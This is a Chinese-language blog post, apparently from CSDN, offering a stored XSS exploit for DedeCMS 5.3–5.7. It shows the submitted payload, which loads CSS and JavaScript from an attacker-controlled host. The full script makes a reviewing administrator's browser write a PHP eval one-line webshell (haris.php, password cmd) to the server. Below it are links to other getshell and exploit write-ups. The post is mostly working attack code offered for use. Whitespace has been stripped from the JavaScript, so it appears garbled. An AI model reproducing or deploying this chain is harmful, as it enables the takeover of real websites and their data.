dedecms xss 0day通杀所有版本 可getshell

最新推荐文章于 2024-02-27 09:20:26 发布
最新推荐文章于 2024-02-27 09:20:26 发布
阅读量1.7k 收藏 1
点赞数
文章标签: dedecms

漏洞虽老,但方法永远不会过时


漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)

  目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:

  1. 开启注册

  2. 开启投稿

注册会员-发表文章投稿,内容如下填写:

<style>@im\port'\http://xxx.com/xss.css';</style>

在你自己的网站xxx.com上新建xss.css内容如下:

body{background-image:url('javascript:document.write("<scriptsrc=http://xxx.com/xss.js></script>")') }

在你自己的网站xxx.com上新建xss.js 内容如下:

varrequest =false;if(window.XMLHttpRequest){request =newXMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType('text/xml');}}elseif(window.ActiveXObject){varversions =['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];for(vari=0;i<versions.length;i++){try{request =newActiveXObject(versions);}catch(e){}}}xmlhttp=request;functiongetFolder(url ){obj =url.split('/')returnobj[obj.length-2]}oUrl =top.location.href;u =getFolder(oUrl);add_admin();functionadd_admin(){varurl="/"+u+"/sys_sql_query.php";varparams ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";xmlhttp.open("POST",url,true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length",params.length);xmlhttp.setRequestHeader("Connection","Keep-Alive");xmlhttp.send(params);}

  当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd。

oceanark
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DedeCMS 存储型xss漏洞1
08-03
DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3475
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
dede ad_js.php getshell,Dedecms 5.7 SP2后台getshell
weixin_27219587的博客
03-29 218
Dedecms 5.7 SP2后台getshell"努力学习才能走上人生巅峰" ——周树人前言最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本dedecms的最新版吧,下载地址:http://www.dedecms.com/products/dedecms/downloads/复现...
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2229
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 991
dedecms后台sql命令写入一句话
齐博 src="/do/js.php?id=775",齐博CMS存储型XSSgetshell(组合利用)
weixin_35841706的博客
03-26 417
齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还是聊以慰藉的,还请各位看官轻轻拍砖. ——by pandas前一段时间西毒爆出qibocms 0day的时候 就看过齐博cms的代码,发现了几个后台的getshell,后台getshell很多,...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源
03-02
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源
xssshell2.0
08-02
xssshell 2.0 非常好用xss跨站工具. author:darkwahaha
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4203
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握XSS漏洞GetShell的方法。
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
XSS也能getshell
u014213713的专栏
05-15 5603
我的想法是这样的 有很多CMS都有 修改模板或者修改文件的功能 我们可以自己构造一个外部的URL去post提交修改模板或其他文件 从而实现XSSgetshell !同样这方法能做很多事情比如增加管理员账号什么的 前提条件要管理员登陆状态下 若CMS系统有XSS漏洞那就更完美了 呵呵 我这里随便找了一套带文件增 删 改 的cms测试呵呵(这CMS也有XSS不过因为魔术原因利用起来不太利索,这
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2242
后台数据库备份getshell,上传图片马并获取图片马路径,过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以过首先将一句话木马写入数据库
记一次XSSgetshell全过程!
hot_milk1的博客
02-27 1049
偶然在一次渗透过程中发现一个客服系统聊天界面发现可以XSS对发送信息处进行抓包,可在content参数插入xss语句这是访客前台效果:这是后台管理的效果:而且只要客服查看信息,便可以执行XSS语句然并卵,本来想钓客服的cookie,登录后台,找到shell点,成功getshell(幻想时间),但是经过测试,发现该客服系统的session是受保护的,并不能窃取到cookie已经决定放弃这个点了,随后在审计源码后,发现了图片上传点老样子,抓包改后缀解码得知,不支持php的文件格式。
csrf漏洞之DedeCMS靶场漏洞(超详细)
qq_59020256的博客
01-22 792
红色边框里面的数字会随着刷新而变化,由此可知存在token因此不能使用csrf注入。第一步,查找插入点,我选择了网站栏目管理的先秦两汉作为插入点。第一个xss漏洞,存在于附件数据管理--->第二个漏洞存在于,内容管理-->更改内容管理。其他的csrf注入点类似,不一一赘述。第四步生成php脚本代码。第三步用burp拦截包。第五步点击submit。第六步提交显示修改成功。
yxcms存储型XSSgetshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1891
yxcms存储型XSSgetshell 漏洞复现
第六天实验详解——dedecmsxss漏洞写马
weixin_34072857的博客
11-10 353
第六天实验详解 **XSS跨站攻击的分类** XSS漏洞类型主要分为持久型和非持久型两种: 1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。 2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。 > DOM XSS漏洞,也分为持久和非持久型两种,多是过...
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9814
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
dedecms-v5.7-sp1远程文件包含getshell
What_Happened的博客
12-13 6252
前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发现了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~ 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。       其次,目标站点的Apache存在文件解
dedecmsxss漏洞冒充管理员
最新发布
06-13
DEDECMS(Discuz!...XSS(跨站脚本攻击)是网络安全中的一种常见漏洞,当恶意用户在系统输入的数据中...3. 更新到最新的DEDECMS版本,因为官方会修复已知的安全漏洞。 4. 启用和定期检查安全模块,如XSS清理工具和防火墙。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值